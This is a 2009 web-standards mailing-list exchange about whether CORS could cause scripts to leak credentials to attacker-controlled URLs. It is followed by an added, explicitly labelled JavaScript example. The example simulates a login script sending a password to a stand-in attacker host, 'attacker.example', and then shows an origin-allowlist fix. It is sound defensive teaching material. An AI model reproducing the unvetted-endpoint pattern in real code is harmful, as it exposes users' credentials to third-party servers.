Re: [cors] security issue with XMLHttpRequest API compatibility

On Mon, Apr 6, 2009 at 11:29 AM, Tyler Close <tyler.close@gmail.com> wrote:
> It looks like the client-side API for cross-origin messaging is the
> same as the current XMLHttpRequest API. I think there's a security
> issue with this decision. The current XMLHttpRequest implementation
> drops any attempted cross-origin request. This implementation protects
> a client-side application that inadvertently sends a request to an
> unexpected target URL. Since the request is dropped by the browser
> implementation, any client credentials (such as a password) in the
> request body are not exposed to the wrong server. Since XMLHttpRequest
> has, to date, provided this protection, client scripts have had no
> real need to vet the URLs that they send messages to. Consequently, it
> seems unlikely that these scripts do any vetting of their target URLs.
> It may be possible for an attacker to cause a client script in another
> domain to send a request to a target URL on the attacker's server.
> Since the attacker controls his server, the resource can be marked as
> accepting cross-domain requests. Since the client script wasn't
> expecting such requests to succeed, it may include client credentials
> in the sent request.

How would the script include client credentials in the request? Can
you show an example of the type of script you are concerned
about?

/ Jonas

Received on Monday, 6 April 2009 20:55:46 UTC
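The scenario Tyler describes, as an added example that is not part of the thread: a page script that posts a password to a URL it never vets, shown first against a browser that drops cross-origin requests, then against one that forwards them, and finally with an origin allowlist that a script would need once the browser no longer protects it. The transport is a constructed stand-in for XMLHttpRequest so it runs offline in Node.js; the origins, endpoint values and credentials are assumed.

```javascript
// Added example, not code from the thread. The transport below is a
// constructed stand-in for XMLHttpRequest; origins and values are assumed.

const APP_ORIGIN = 'https://app.example';   // assumed origin of the page

// Stand-in for the browser. Pre-CORS: a cross-origin request is dropped
// before it leaves, so the body is never exposed. With CORS: the request,
// body included, reaches the server (for a non-preflighted request the
// browser only inspects the server's CORS headers on the response).
function makeTransport({ corsEnabled }) {
  const sent = [];
  return {
    sent,
    send(url, body) {
      const origin = new URL(url, APP_ORIGIN).origin;
      if (origin !== APP_ORIGIN && !corsEnabled) {
        return { delivered: false, reason: 'cross-origin request dropped by browser' };
      }
      sent.push({ origin, body });
      return { delivered: true, origin };
    },
  };
}

// Vulnerable pattern: the login endpoint comes from a value the script
// does not vet (a config field, a URL fragment, a stored setting) and the
// password goes into the body. Pre-CORS the browser's drop hid the flaw.
function loginUnvetted(transport, endpoint, username, password) {
  const body = `user=${encodeURIComponent(username)}&pass=${encodeURIComponent(password)}`;
  return transport.send(endpoint, body);
}

// Hardened pattern: resolve the URL the way the browser will and refuse
// to send credentials unless the resulting origin is on an allowlist.
// Exact origin comparison also rejects lookalikes such as
// https://app.example.attacker.example and protocol-relative //host/path.
const ALLOWED_ORIGINS = new Set([APP_ORIGIN]);

function loginVetted(transport, endpoint, username, password) {
  let origin;
  try {
    origin = new URL(endpoint, APP_ORIGIN).origin;
  } catch (e) {
    return { delivered: false, reason: 'unparseable endpoint' };
  }
  if (!ALLOWED_ORIGINS.has(origin)) {
    return { delivered: false, reason: `refusing to send credentials to ${origin}` };
  }
  const body = `user=${encodeURIComponent(username)}&pass=${encodeURIComponent(password)}`;
  return transport.send(endpoint, body);
}

// Walk through the cases. The attacker's URL is a constructed value that
// stands in for whatever an attacker managed to feed the script.
function demo() {
  const attackerUrl = 'https://attacker.example/login';
  const results = {};

  const legacy = makeTransport({ corsEnabled: false });
  results.preCors = loginUnvetted(legacy, attackerUrl, 'alice', 'hunter2');

  const cors = makeTransport({ corsEnabled: true });
  results.withCors = loginUnvetted(cors, attackerUrl, 'alice', 'hunter2');
  results.leakedBody = cors.sent.length ? cors.sent[0].body : null;

  const hardened = makeTransport({ corsEnabled: true });
  results.vetted = loginVetted(hardened, attackerUrl, 'alice', 'hunter2');
  results.vettedOk = loginVetted(hardened, '/login', 'alice', 'hunter2');
  results.hardenedSentCount = hardened.sent.length;
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The point of the allowlist check is that it does not depend on the browser: it rejects the attacker's URL whether or not the attacker's server opts in to cross-origin requests, and it resolves relative and protocol-relative forms the same way the browser does before comparing origins.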